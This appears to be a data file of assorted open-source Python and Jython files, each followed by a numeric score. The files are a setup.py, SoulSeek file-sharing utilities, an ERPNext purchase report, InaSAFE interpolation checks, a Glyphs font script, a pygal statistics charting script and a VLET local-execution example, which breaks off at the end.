#!/usr/bin/env python # Copyright 2014 Rackspace # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the # License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS # IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language # governing permissions and limitations under the License. import os import sys import setuptools # Utility function to read the README file def readfile(filename): with open(filename) as f: return f.read() # Utility function to read requirements.txt files def readreq(filename): result = [] with open(filename) as f: for line in f: line = line.strip() # Process requirement file references if line.startswith('-r '): subfilename = line.split(None, 1)[-1].split('#', 1)[0].strip() if subfilename: result += readreq(subfilename) continue # Strip out "-e" prefixes if line.startswith('-e '): line = line.split(None, 1)[-1] # Detect URLs in the line idx = line.find('#egg=') if idx >= 0: line = line[idx + 5:] # Strip off any comments line = line.split('#', 1)[0].strip() # Save the requirement if line: result.append(line.split('#', 1)[0].strip()) return result # Invoke setup setuptools.setup( name='timid', version='0.1.2', author='Kevin L. Mitchell', author_email='kevin.mitchell@rackspace.com', url='https://github.com/rackerlabs/timid', description='Timid test runner', long_description=readfile('README.rst'), license='Apache License (2.0)', classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Console', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', ], packages=setuptools.find_packages(exclude=['tests', 'tests.*']), install_requires=readreq('requirements.txt'), tests_require=readreq('test-requirements.txt'), entry_points={ 'console_scripts': [ 'timid = timid.main:timid.console', ], 'timid.actions': [ 'chdir = timid.environment:DirectoryAction', 'env = timid.environment:EnvironmentAction', 'include = timid.steps:IncludeAction', 'run = timid.environment:RunAction', 'var = timid.context:VariableAction', ], 'timid.modifiers': [ 'when = timid.modifiers:ConditionalModifier', 'ignore-errors = timid.modifiers:IgnoreErrorModifier', ], }, )
0
# Copyright (c) 2001-2003 Alexander Kanavin. All rights reserved. # licensed under the GNU GPL 2 # # 2004-10-8 NRY Imported from PySoulSeek package """ This module contains utility fuctions. """ import string import os.path import os,dircache import mp3 version = "1.2.5" def getServerList(url): """ Parse server text file from http://www.slsk.org and return a list of servers """ import urllib,string try: f = urllib.urlopen(url) list = [string.strip(i) for i in f.readlines()] except: return [] try: list = list[list.index("--servers")+1:] except: return [] list = [string.split(i,":",2) for i in list] try: return [[i[0],i[2]] for i in list] except: return [] def rescandirs(shared, sharedmtimes, sharedfiles, sharedfilesstreams, yieldfunction): newmtimes = getDirsMtimes(shared,yieldfunction) newsharedfiles = getFilesList(newmtimes, sharedmtimes, sharedfiles,yieldfunction) newsharedfilesstreams = getFilesStreams(newmtimes, sharedmtimes, sharedfilesstreams, newsharedfiles,yieldfunction) newwordindex, newfileindex = getFilesIndex(newmtimes, sharedmtimes, shared, newsharedfiles,yieldfunction) return newsharedfiles,newsharedfilesstreams,newwordindex,newfileindex, newmtimes def getDirsMtimes(dirs, yieldcall = None): list = {} for i in dirs: i = i.replace("//","/") try: contents = dircache.listdir(i) mtime = os.path.getmtime(i) except OSError, errtuple: print errtuple continue list[i] = mtime for f in contents: pathname = os.path.join(i, f) try: isdir = os.path.isdir(pathname) mtime = os.path.getmtime(pathname) except OSError, errtuple: print errtuple continue else: if isdir: list[pathname] = mtime dircontents = getDirsMtimes([pathname]) for k in dircontents: list[k] = dircontents[k] if yieldcall is not None: yieldcall() return list def getFilesList(mtimes, oldmtimes, oldlist, yieldcall = None): """ Get a list of files with their filelength and (if mp3) bitrate and track length in seconds """ list = {} for i in mtimes: if oldmtimes.has_key(i): if mtimes[i] == oldmtimes[i]: list[i] = oldlist[i] continue list[i] = [] try: contents = dircache.listdir(i) except OSError, errtuple: print errtuple continue for f in contents: pathname = os.path.join(i, f) try: isfile = os.path.isfile(pathname) except OSError, errtuple: print errtuple continue else: if isfile: # It's a file, check if it is mp3 list[i].append(getFileInfo(f,pathname)) if yieldcall is not None: yieldcall() return list def getFileInfo(name, pathname): size = os.path.getsize(pathname) if name[-4:] == ".mp3" or name[-4:] == ".MP3": mp3info=mp3.detect_mp3(pathname) if mp3info: if mp3info["vbr"]: bitrateinfo = (mp3info["vbrrate"],1) else: bitrateinfo = (mp3info["bitrate"],0) fileinfo = (name,size,bitrateinfo,mp3info["time"]) else: fileinfo = (name,size,None,None) elif name[-4:] == ".ogg" or name[-4:] == ".OGG": try: import ogg.vorbis vf = ogg.vorbis.VorbisFile(pathname) time = int(vf.time_total(0)) bitrate = vf.bitrate(0)/1000 fileinfo = (name,size, (bitrate,0), time) except: fileinfo = (name,size,None,None) else: fileinfo = (name,size,None,None) return fileinfo def getFilesStreams(mtimes, oldmtimes, oldstreams, sharedfiles, yieldcall = None): streams = {} for i in mtimes.keys(): if oldmtimes.has_key(i): if mtimes[i] == oldmtimes[i]: streams[i] = oldstreams[i] continue streams[i] = getDirStream(sharedfiles[i]) if yieldcall is not None: yieldcall() return streams def getDirStream(dir): from slskmessages import SlskMessage msg = SlskMessage() stream = msg.packObject(len(dir)) for i in dir: stream = stream + getByteStream(i) return stream def getByteStream(fileinfo): from slskmessages import SlskMessage self = SlskMessage() stream = chr(1) + self.packObject(fileinfo[0]) + self.packObject(fileinfo[1]) + self.packObject(0) if fileinfo[2] is not None: stream = stream + self.packObject('mp3') + self.packObject(3) stream = stream + self.packObject(0)+ self.packObject(fileinfo[2][0])+self.packObject(1)+ self.packObject(fileinfo[3])+self.packObject(2)+self.packObject(fileinfo[2][1]) else: stream = stream + self.packObject('') + self.packObject(0) return stream def getFilesIndex(mtimes, oldmtimes, shareddirs,sharedfiles, yieldcall = None): wordindex = {} fileindex = {} index = 0 for i in mtimes.keys(): for j in sharedfiles[i]: indexes = getIndexWords(i,j[0],shareddirs) for k in indexes: wordindex.setdefault(k,[]).append(index) fileindex[str(index)] = (os.path.join(i,j[0]),)+j[1:] index += 1 if yieldcall is not None: yieldcall() return wordindex, fileindex def getIndexWords(dir,file,shareddirs): import os.path,string for i in shareddirs: if os.path.commonprefix([dir,i]) == i: dir = dir[len(i):] words = string.split(string.lower(string.translate(dir+' '+file, string.maketrans(string.punctuation,string.join([' ' for i in string.punctuation],''))))) # remove duplicates d = {} for x in words: d[x] = x return d.values()
0.037733
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe, erpnext from frappe import _ from frappe.utils import flt from erpnext.accounts.report.item_wise_sales_register.item_wise_sales_register import (get_tax_accounts, get_grand_total, add_total_row, get_display_value, get_group_by_and_display_fields, add_sub_total_row, get_group_by_conditions) def execute(filters=None): return _execute(filters) def _execute(filters=None, additional_table_columns=None, additional_query_columns=None): if not filters: filters = {} filters.update({"from_date": filters.get("date_range")[0], "to_date": filters.get("date_range")[1]}) columns = get_columns(additional_table_columns, filters) company_currency = erpnext.get_company_currency(filters.company) item_list = get_items(filters, additional_query_columns) aii_account_map = get_aii_accounts() if item_list: itemised_tax, tax_columns = get_tax_accounts(item_list, columns, company_currency, doctype="Purchase Invoice", tax_doctype="Purchase Taxes and Charges") po_pr_map = get_purchase_receipts_against_purchase_order(item_list) data = [] total_row_map = {} skip_total_row = 0 prev_group_by_value = '' if filters.get('group_by'): grand_total = get_grand_total(filters, 'Purchase Invoice') for d in item_list: if not d.stock_qty: continue purchase_receipt = None if d.purchase_receipt: purchase_receipt = d.purchase_receipt elif d.po_detail: purchase_receipt = ", ".join(po_pr_map.get(d.po_detail, [])) expense_account = d.expense_account or aii_account_map.get(d.company) row = { 'item_code': d.item_code, 'item_name': d.item_name, 'item_group': d.item_group, 'description': d.description, 'invoice': d.parent, 'posting_date': d.posting_date, 'supplier': d.supplier, 'supplier_name': d.supplier_name } if additional_query_columns: for col in additional_query_columns: row.update({ col: d.get(col) }) row.update({ 'credit_to': d.credit_to, 'mode_of_payment': d.mode_of_payment, 'project': d.project, 'company': d.company, 'purchase_order': d.purchase_order, 'purchase_receipt': d.purchase_receipt, 'expense_account': expense_account, 'stock_qty': d.stock_qty, 'stock_uom': d.stock_uom, 'rate': d.base_net_amount / d.stock_qty, 'amount': d.base_net_amount }) total_tax = 0 for tax in tax_columns: item_tax = itemised_tax.get(d.name, {}).get(tax, {}) row.update({ frappe.scrub(tax + ' Rate'): item_tax.get("tax_rate", 0), frappe.scrub(tax + ' Amount'): item_tax.get("tax_amount", 0), }) total_tax += flt(item_tax.get("tax_amount")) row.update({ 'total_tax': total_tax, 'total': d.base_net_amount + total_tax, 'currency': company_currency }) if filters.get('group_by'): row.update({'percent_gt': flt(row['total']/grand_total) * 100}) group_by_field, subtotal_display_field = get_group_by_and_display_fields(filters) data, prev_group_by_value = add_total_row(data, filters, prev_group_by_value, d, total_row_map, group_by_field, subtotal_display_field, grand_total, tax_columns) add_sub_total_row(row, total_row_map, d.get(group_by_field, ''), tax_columns) data.append(row) if filters.get('group_by') and item_list: total_row = total_row_map.get(prev_group_by_value or d.get('item_name')) total_row['percent_gt'] = flt(total_row['total']/grand_total * 100) data.append(total_row) data.append({}) add_sub_total_row(total_row, total_row_map, 'total_row', tax_columns) data.append(total_row_map.get('total_row')) skip_total_row = 1 return columns, data, None, None, None, skip_total_row def get_columns(additional_table_columns, filters): columns = [] if filters.get('group_by') != ('Item'): columns.extend( [ { 'label': _('Item Code'), 'fieldname': 'item_code', 'fieldtype': 'Link', 'options': 'Item', 'width': 120 }, { 'label': _('Item Name'), 'fieldname': 'item_name', 'fieldtype': 'Data', 'width': 120 } ] ) if filters.get('group_by') not in ('Item', 'Item Group'): columns.extend([ { 'label': _('Item Group'), 'fieldname': 'item_group', 'fieldtype': 'Link', 'options': 'Item Group', 'width': 120 } ]) columns.extend([ { 'label': _('Description'), 'fieldname': 'description', 'fieldtype': 'Data', 'width': 150 }, { 'label': _('Invoice'), 'fieldname': 'invoice', 'fieldtype': 'Link', 'options': 'Purchase Invoice', 'width': 120 }, { 'label': _('Posting Date'), 'fieldname': 'posting_date', 'fieldtype': 'Date', 'width': 120 } ]) if filters.get('group_by') != 'Supplier': columns.extend([ { 'label': _('Supplier'), 'fieldname': 'supplier', 'fieldtype': 'Link', 'options': 'Supplier', 'width': 120 }, { 'label': _('Supplier Name'), 'fieldname': 'supplier_name', 'fieldtype': 'Data', 'width': 120 } ]) if additional_table_columns: columns += additional_table_columns columns += [ { 'label': _('Payable Account'), 'fieldname': 'credit_to', 'fieldtype': 'Link', 'options': 'Account', 'width': 80 }, { 'label': _('Mode Of Payment'), 'fieldname': 'mode_of_payment', 'fieldtype': 'Link', 'options': 'Mode of Payment', 'width': 120 }, { 'label': _('Project'), 'fieldname': 'project', 'fieldtype': 'Link', 'options': 'Project', 'width': 80 }, { 'label': _('Company'), 'fieldname': 'company', 'fieldtype': 'Link', 'options': 'Company', 'width': 80 }, { 'label': _('Purchase Order'), 'fieldname': 'purchase_order', 'fieldtype': 'Link', 'options': 'Purchase Order', 'width': 100 }, { 'label': _("Purchase Receipt"), 'fieldname': 'Purchase Receipt', 'fieldtype': 'Link', 'options': 'Purchase Receipt', 'width': 100 }, { 'label': _('Expense Account'), 'fieldname': 'expense_account', 'fieldtype': 'Link', 'options': 'Account', 'width': 100 }, { 'label': _('Stock Qty'), 'fieldname': 'stock_qty', 'fieldtype': 'Float', 'width': 100 }, { 'label': _('Stock UOM'), 'fieldname': 'stock_uom', 'fieldtype': 'Link', 'options': 'UOM', 'width': 100 }, { 'label': _('Rate'), 'fieldname': 'rate', 'fieldtype': 'Float', 'options': 'currency', 'width': 100 }, { 'label': _('Amount'), 'fieldname': 'amount', 'fieldtype': 'Currency', 'options': 'currency', 'width': 100 }, { 'fieldname': 'currency', 'label': _('Currency'), 'fieldtype': 'Currency', 'width': 80, 'hidden': 1 } ] if filters.get('group_by'): columns.append({ 'label': _('% Of Grand Total'), 'fieldname': 'percent_gt', 'fieldtype': 'Float', 'width': 80 }) return columns def get_conditions(filters): conditions = "" for opts in (("company", " and company=%(company)s"), ("supplier", " and `tabPurchase Invoice`.supplier = %(supplier)s"), ("item_code", " and `tabPurchase Invoice Item`.item_code = %(item_code)s"), ("from_date", " and `tabPurchase Invoice`.posting_date>=%(from_date)s"), ("to_date", " and `tabPurchase Invoice`.posting_date<=%(to_date)s"), ("mode_of_payment", " and ifnull(mode_of_payment, '') = %(mode_of_payment)s")): if filters.get(opts[0]): conditions += opts[1] if not filters.get("group_by"): conditions += "ORDER BY `tabPurchase Invoice`.posting_date desc, `tabPurchase Invoice Item`.item_code desc" else: conditions += get_group_by_conditions(filters, 'Purchase Invoice') return conditions def get_items(filters, additional_query_columns): conditions = get_conditions(filters) if additional_query_columns: additional_query_columns = ', ' + ', '.join(additional_query_columns) else: additional_query_columns = '' return frappe.db.sql(""" select `tabPurchase Invoice Item`.`name`, `tabPurchase Invoice Item`.`parent`, `tabPurchase Invoice`.posting_date, `tabPurchase Invoice`.credit_to, `tabPurchase Invoice`.company, `tabPurchase Invoice`.supplier, `tabPurchase Invoice`.remarks, `tabPurchase Invoice`.base_net_total, `tabPurchase Invoice Item`.`item_code`, `tabPurchase Invoice Item`.`item_name`, `tabPurchase Invoice Item`.`item_group`, `tabPurchase Invoice Item`.description, `tabPurchase Invoice Item`.`project`, `tabPurchase Invoice Item`.`purchase_order`, `tabPurchase Invoice Item`.`purchase_receipt`, `tabPurchase Invoice Item`.`po_detail`, `tabPurchase Invoice Item`.`expense_account`, `tabPurchase Invoice Item`.`stock_qty`, `tabPurchase Invoice Item`.`stock_uom`, `tabPurchase Invoice Item`.`base_net_amount`, `tabPurchase Invoice`.`supplier_name`, `tabPurchase Invoice`.`mode_of_payment` {0} from `tabPurchase Invoice`, `tabPurchase Invoice Item` where `tabPurchase Invoice`.name = `tabPurchase Invoice Item`.`parent` and `tabPurchase Invoice`.docstatus = 1 %s """.format(additional_query_columns) % (conditions), filters, as_dict=1) def get_aii_accounts(): return dict(frappe.db.sql("select name, stock_received_but_not_billed from tabCompany")) def get_purchase_receipts_against_purchase_order(item_list): po_pr_map = frappe._dict() po_item_rows = list(set([d.po_detail for d in item_list])) if po_item_rows: purchase_receipts = frappe.db.sql(""" select parent, purchase_order_item from `tabPurchase Receipt Item` where docstatus=1 and purchase_order_item in (%s) group by purchase_order_item, parent """ % (', '.join(['%s']*len(po_item_rows))), tuple(po_item_rows), as_dict=1) for pr in purchase_receipts: po_pr_map.setdefault(pr.po_detail, []).append(pr.parent) return po_pr_map
0.033238
# coding=utf-8 """ **Commonalities used in both 1d and 2d interpolation** This module provides commonalities shared between interpolation1d and interpolation2d. This includes input data validation methods. """ import numpy from safe.common.exceptions import BoundsError, InaSAFEError def validate_mode(mode): """Validate that the mode is an allowable value. :param mode: Determines the interpolation order. Options are: * 'constant' - piecewise constant nearest neighbour interpolation * 'linear' - bilinear interpolation using the two nearest \ neighbours (default) :type mode: str :raises: InaSAFEError """ msg = ( 'Only mode "linear" and "constant" are implemented. I got "%s"' % mode) if mode not in ['linear', 'constant']: raise InaSAFEError(msg) def validate_coordinate_vector(coordinates, coordinate_name): """Validate that the coordinates vector are valid :param coordinates: The coordinates vector :type coordinates: numpy.ndarray :param coordinate_name: The user recognizable name of the coordinates. :type coordinate_name: str :raise: Exception, InaSAFEError :returns: Coordinates cast as a numpy arry """ try: coordinates = numpy.array(coordinates) except Exception, e: msg = ( 'Input vector %s could not be converted to numpy array: ' '%s' % (coordinate_name, str(e))) raise Exception(msg) if not min(coordinates) == coordinates[0]: msg = ( 'Input vector %s must be monotoneously increasing. ' 'I got min(%s) == %.15f, but coordinates[0] == %.15f' % ( coordinate_name, coordinate_name, min(coordinates), coordinates[0])) raise InaSAFEError(msg) if not max(coordinates) == coordinates[-1]: msg = ( 'Input vector coordinates must be monotoneously increasing. I got ' 'max(coordinates) == %.15f, but coordinates[-1] == %.15f' % ( max(coordinates), coordinates[-1])) raise InaSAFEError(msg) return coordinates def validate_inputs( x=None, y=None, z=None, points=None, bounds_error=None): """Check inputs for interpolate1d and interpolate2d functions :param x: 1D array of x-coordinates on which to interpolate :type x: numpy.ndarray :param y: 1D array of y-coordinates on which to interpolate :type z: numpy.ndarray :param z: array of values for each x :type z: numpy.ndarray :param points: 1D array of coordinates where interpolated values are sought :type points: numpy.ndarray :param bounds_error: Flag to indicate whether an exception will be raised when interpolated values are requested outside the domain of the input data. If False, nan is returned for those values. :type bounds_error: bool :returns: x, z and points :raises: RuntimeError, Exception """ x = validate_coordinate_vector(x, 'x') if y is None: dimensions = 1 else: dimensions = 2 y = validate_coordinate_vector(y, 'y') try: z = numpy.array(z) except Exception, e: msg = ( 'Input vector z could not be converted to a numpy array: ' '%s' % str(e)) raise Exception(msg) if len(z.shape) != dimensions: msg = 'z must be a %iD numpy array got a: %dD' % ( dimensions, len(z.shape)) raise Exception(msg) Nx = len(x) points = numpy.array(points) if not len(points.shape) == dimensions: msg = 'Interpolation points must be a %id array' % dimensions raise RuntimeError(msg) if dimensions == 1: (m,) = z.shape if not Nx == m: msg = ( 'Input array z must have same length as x (%i).' 'However, Z has length %i.' % (Nx, m)) raise RuntimeError(msg) # Get interpolation points xi = points[:] else: (m, n) = z.shape Ny = len(y) if not (Nx == m and Ny == n): msg = ( 'Input array Z must have dimensions %i x %i corresponding to ' 'the lengths of the input coordinates x and y. However, ' 'Z has dimensions %i x %i.' % (Nx, Ny, m, n)) raise InaSAFEError(msg) # Get interpolation points points = numpy.array(points) xi = points[:, 0] eta = points[:, 1] if bounds_error: xi0 = min(xi) xi1 = max(xi) if xi0 < x[0]: msg = ( 'Interpolation point xi=%f was less than the smallest ' 'value in domain (x=%f) and bounds_error was requested.' % (xi0, x[0])) raise BoundsError(msg) if xi1 > x[-1]: msg = ( 'Interpolation point xi=%f was greater than the largest ' 'value in domain (x=%f) and bounds_error was requested.' % (xi1, x[-1])) raise BoundsError(msg) if dimensions == 2: # noinspection PyUnboundLocalVariable eta0 = min(eta) eta1 = max(eta) if eta0 < y[0]: msg = ( 'Interpolation point eta=%f was less than the smallest ' 'value in domain (y=%f) and bounds_error was requested.' % (eta0, y[0])) raise BoundsError(msg) if eta1 > y[-1]: msg = ( 'Interpolation point eta=%f was greater than the largest ' 'value in domain (y=%f) and bounds_error was requested.' % (eta1, y[-1])) raise BoundsError(msg) if dimensions == 1: return x, z, xi else: return x, y, z, xi, eta
0
#MenuTitle: Flashify Pixels # -*- coding: utf-8 -*- __doc__=""" Adds small bridges to diagonal pixel connections (where two pixel corners touch). Otherwise your counters may be lost in the Flash text engine. """ import GlyphsApp Font = Glyphs.font layers = Font.selectedLayers removeOverlapFilter = NSClassFromString("GlyphsFilterRemoveOverlap").alloc().init() def karo( x, y ): koordinaten = [ [x-1,y], [x,y-1], [x+1,y], [x,y+1] ] karo = GSPath() for xy in koordinaten: newnode = GSNode() newnode.type = GSLINE newnode.position = (xy[0], xy[1]) karo.nodes.append( newnode ) karo.closed = True return karo def process( thisLayer ): thisLayer.parent.beginUndo() purePathsLayer = thisLayer.copyDecomposedLayer() removeOverlapFilter.runFilterWithLayer_error_( purePathsLayer, None ) coordinatelist = [] for thisPath in purePathsLayer.paths: for thisNode in thisPath.nodes: coordinatelist.append([ thisNode.x, thisNode.y ]) mylength = len( coordinatelist ) for cur1 in range( mylength ): for cur2 in range( cur1+1, mylength, 1 ): if coordinatelist[cur1] == coordinatelist[cur2]: [ my_x, my_y ] = coordinatelist[ cur1 ] thisLayer.paths.append( karo( my_x, my_y ) ) print thisLayer.parent.name, ":", my_x, my_y thisLayer.parent.endUndo() print "Flashifying " + str( Font.familyName ) oldGridstep = Font.gridLength if oldGridstep > 1: Font.gridLength = 1 Font.disableUpdateInterface() for thisLayer in layers: process( thisLayer ) Font.enableUpdateInterface() Font.gridLength = oldGridstep
0.047773
#! /usr/bin/python # -*- coding: utf-8 -*- # Developped with python 2.7.3 import tools import sys import os import matplotlib import pygal import numbers from math import sqrt def lst_str_to_float(l): i = 0 for el in l: l[i] = float(el) i +=1 return l def do_your_job(full_path_csv_file): file_name = (full_path_csv_file.split("/")).pop() data = tools.read_specific_file(full_path_csv_file, "csv") # I guess that encoding the file in json would be a better choice.... # each line of the csv file (the expected one) is formated as it follow: key::value;key::value; etc... # where value could be : character or key:value table ( e.g. ["a","b","c"]:[1,2,3] ) tab = [] temp_map = {} for line in data: temp_map = {} for pair in line: pair = pair.split("::") if len(pair[1].split(":")) == 1: if isinstance(pair[1], numbers.Real) or pair[1].isdigit(): temp_map[pair[0]] = float(pair[1]) else: temp_map[pair[0]] = pair[1] else: temp_map[pair[0]] = {} map_of_object_int = (pair[1].split(":")) # list of object (map_of_object_int[0]) could be : floats or strings list_of_keys = tools.str_table_to_list(map_of_object_int[0]) list_of_values = tools.str_table_to_list(map_of_object_int[1]) i = 0 for key in list_of_keys: temp_map[pair[0]][key] = list_of_values[i] i += 1 tab.append(temp_map) # static values mapped with possible dynamic (string) values key_value_of_data = { 0:"Value", 1:"C", 2:"D", 3:"IdealRepartition", 4:"GuiltRep", 5:"SumPayOffs", 6:"MinPayOffs", 7:"MaxPayOffs", 8:"Iteration",9:"IdealRepartition",91:"Rawls",92:"Harsanyi",10:"GainFreq"} list_of_conf = {"C":{},"D":{}} computed_stat = {0:"gain",1:"guilt_lvl",2:"iteration"} stat_elements = {0:"min",1:"max",2:"mean",3:"sum", 4:"standard_deviation", 5:"configuration_count"} statistics = {} # 1:{0:{},1:{}},2:{0:{},1:{}} # init statistics variable for key in [1,2]: # 1 is C and 2 is D statistics[key] = {} statistics[key][key_value_of_data[0]] = [] # list of configurations in statistics[key] for type_stat in computed_stat.keys(): statistics[key][type_stat] = {} for stat_element in stat_elements.keys(): val = 0 if stat_element == 0: # min val = 9999 if stat_element == 1: # max val = -9999 statistics[key][type_stat][stat_element] = val # statistics computation first_it_x = True # a little trick to bypass the -9999 and 9999 min / max for record in tab: ## number of agent of the record number_of_agent = 0 if key_value_of_data[91] in record[key_value_of_data[9]].keys(): number_of_agent += float(record[key_value_of_data[9]][key_value_of_data[91]]) if key_value_of_data[92] in record[key_value_of_data[9]].keys(): number_of_agent += float(record[key_value_of_data[9]][key_value_of_data[92]]) # fix bug ideal key = '' if number_of_agent == 0: number_of_agent = record[key_value_of_data[9]][record[key_value_of_data[9]].keys()[0]] ## absolute strategy of record if record[key_value_of_data[1]]>record[key_value_of_data[2]]: strategy = 1 else: strategy = 2 statistics[strategy][key_value_of_data[0]].append(record[key_value_of_data[0]]) # we add configuration (TRPS) string in C or D side of the map #### guilt #### omega = sum(record[key_value_of_data[4]].values()) ## count first_it_y = True for guilt_lvl, guilt_weight in record[key_value_of_data[4]].iteritems(): guilt_lvl = float(guilt_lvl) guilt_weight = float(guilt_weight) if first_it_y: # We set guilt level default min and max value as the first iteration of the map statistics[strategy][1][0] = guilt_lvl statistics[strategy][1][1] = guilt_lvl first_it_y = False ### guilt scale ### ## min if guilt_lvl < statistics[strategy][1][0]: statistics[strategy][1][0] = guilt_lvl ## max if guilt_lvl > statistics[strategy][1][1]: statistics[strategy][1][1] = guilt_lvl ## sum statistics[strategy][1][3] += (guilt_lvl*guilt_weight)/omega ## count statistics[strategy][1][5] += guilt_weight/omega #### gain #### if first_it_x: statistics[strategy][0][0] = float(record[key_value_of_data[6]]) statistics[strategy][0][1] = float(record[key_value_of_data[7]]) ## min if float(record[key_value_of_data[6]]) < statistics[strategy][0][0]: statistics[strategy][0][0] = float(record[key_value_of_data[6]]) ## max if float(record[key_value_of_data[7]]) > statistics[strategy][0][1]: statistics[strategy][0][1] = float(record[key_value_of_data[7]]) ## sum statistics[strategy][0][3] += float(record[key_value_of_data[5]]) ## count statistics[strategy][0][5] += number_of_agent #### iteration #### ## min if float(record[key_value_of_data[8]]) < statistics[strategy][2][0]: statistics[strategy][2][0] = float(record[key_value_of_data[8]]) ## max if float(record[key_value_of_data[8]]) > statistics[strategy][2][1]: statistics[strategy][2][1] = float(record[key_value_of_data[8]]) ## sum statistics[strategy][2][3] += float(record[key_value_of_data[8]]) ## count statistics[strategy][2][5] += 1 first_it_x = False for key in [1,2]: for stat_type in computed_stat.keys(): if(statistics[key][stat_type][5] != 0): ## mean statistics[key][stat_type][2] = round(float(statistics[key][stat_type][3]) / statistics[key][stat_type][5], 2) ## std-dev statistics[key][stat_type][4] = round( sqrt( abs(float(statistics[key][stat_type][3]) - (statistics[key][stat_type][5] * statistics[key][stat_type][2])) ) ,4) else: statistics[key][stat_type][2] = 0 statistics[key][stat_type][4] = 0 path = "" # no need to specify any path yet. from pygal.style import LightStyle # Gains chart gain_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) gain_chart.title = 'Gains knowing strategy types' gain_chart.x_labels = map(str, ["Cooperative ("+str(int(statistics[1][0][5]))+" agt)","Non-cooperative ("+str(int(statistics[2][0][5]))+" agt)"]) gain_chart.add('Min', [statistics[1][0][0], statistics[2][0][0]]) gain_chart.add('Mean', [statistics[1][0][2], statistics[2][0][2]]) gain_chart.add('Max', [statistics[1][0][1], statistics[2][0][1]]) #gain_chart.add('Std-dev', [statistics[1][0][4], statistics[2][0][4]]) gain_chart.render_to_file(path+"gains_with_"+file_name+".svg") gain_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) gain_chart.title = 'Sum of gains knowing strategy types' gain_chart.x_labels = map(str, ['Cooperative ('+str(int(statistics[1][0][5]))+' agt)','Non-cooperative ('+str(int(statistics[2][0][5]))+' agt)','Both ('+str(int(statistics[1][0][5])+int(statistics[1][0][5]))+' agt)']) gain_chart.add("", [statistics[1][0][3], statistics[2][0][3], statistics[1][0][3]+statistics[2][0][3]]) gain_chart.render_to_file(path+"sum_gains_with_"+file_name+".svg") # Strat dominance chart strat_chart = pygal.Pie(fill=True, interpolate='cubic', style=LightStyle) strat_chart.title = 'Strategy which prevail' strat_chart.x_labels = map(str, ["Strategy prevailance among all configurations"]) strat_chart.add('Absolute cooperation', statistics[1][0][5]) strat_chart.add('Absolute defection', statistics[2][0][5]) strat_chart.render_to_file(path+"strat_prev_with_"+file_name+".svg") # Guilt repartition : min max mean... knowing C and D guilt_rep_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) guilt_rep_chart.title = 'Global repartition of guilt knowing strategies' guilt_rep_chart.x_labels = map(str, ["Cooperative ("+str(int(statistics[1][0][5]))+" agt)","Non-cooperative ("+str(int(statistics[2][0][5]))+" agt)","Both"]) guilt_rep_chart.add('Min', [statistics[1][1][0],statistics[2][1][0],min(statistics[1][1][0],statistics[2][1][0])]) guilt_rep_chart.add('Mean', [statistics[1][1][2],statistics[2][1][2], (statistics[1][1][2] + statistics[2][1][2]) / 2]) guilt_rep_chart.add('Max', [statistics[1][1][1],statistics[2][1][1],max(statistics[1][1][1],statistics[2][1][1])]) guilt_rep_chart.add('Std-dev', [statistics[1][1][4], statistics[2][1][4], (statistics[1][1][4] + statistics[2][1][4]) / 2]) guilt_rep_chart.render_to_file(path+"guilt_rep_with_"+file_name+".svg") # Iteration chart iter_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) iter_chart.title = 'Global iterations' iter_chart.x_labels = map(str, ["Iterations"]) iter_chart.add('Min', [ min([statistics[1][2][0], statistics[2][2][0]]) ] ) iter_chart.add('Mean', [ (statistics[1][2][2] + statistics[2][2][2]) / 2 ] ) iter_chart.add('Max', [ max(statistics[1][2][1], statistics[2][2][1]) ] ) iter_chart.render_to_file(path+"iteration_chart_"+file_name+".svg") # For now in sequential exp results in Pure strategy we have the following elements : ## Value::T R P S C::NumberOfCooperators D::NbOfDefectors IdealRepartition::[key1,key2,...]:[val1,val2] ## GuiltRep::[key1,...]:[val1,...] SumPayOffs::Float MinPayOffs::Float MaxPayOffs::Float Iteration::NbOfIteration # We want to do some chart that could be interesting for observations. What could be interesting : # -> Dominant strategy (C or D) % of dominance among experiences # -> Global PayOffs of C strategy vs the other (max, min, mean and e-type) when they prevail # (-> Min, max, mean and e-type global (C+D) PayOffs) # -> GuiltRepartition : ## -> mean, max, min, e-type knowing C ## -> mean, max, min, e-type knowing D if __name__ == '__main__': if len(sys.argv) == 2: full_path_csv_file = sys.argv[1] do_your_job(full_path_csv_file) else: print("Wrong number of argument (1 arg is expected). It should be : something.csv file")
0.033986
## # VRS Execution # (C) www.vl-e.nl ### # Vlet version : @VLET_VERSION@ # Author : Piter T. de Boer # Info : # VLET vrs jython interface example. # To start execute this jython file, use: # $VLET_INSTALL/bin/jython.sh <jython.file> ## #import VLET Util classes from nl.uva.vlet.exec import LocalExec,LocalProcess # use VLET Global class: from nl.uva.vlet import Global #python imports import time ### ### Simple Local Execution using VL-e Toolkit: ### # Bash interface : print "--- bash example ---" # command line + arguments to execute: commands=["/bin/bash","-c","echo hello world!; echo this is standard error >&2"]; #result is an String Array {stdout,stderr,status} result=LocalExec.execute(commands) stdout=result[0]; # string stderr=result[1]; # string status=result[2]; # string print "--- result ---" print " Standard out = ", stdout; print " Standard err = ", stderr; print " Exit status = ", status; ### ### non script command "ls" from command line: ### print "--- ls example ---" # use vlet Global: home=Global.getUserHome(); # command line + arguments to execute: commands=["ls","-a",home] [stdout,stderr,status]=LocalExec.execute(commands) print "--- result ---" print " Standard out = ", stdout; print " Standard err = ", stderr; print " Exit status = ", status; ## ## Background process and monitoring example ## print "--- Background example ---" # command line + arguments to execute: commands=["/bin/bash","-c","for a in 1 2 3 4 5 6 7; do echo run-$a; sleep 1 ; done ; echo done"] #Start script in background and wait process=LocalExec.execute(commands,False) # do stuff print "Process isTerminated() I =",process.isTerminated() time.sleep(1) print "Process isTerminated() II =",process.isTerminated() # 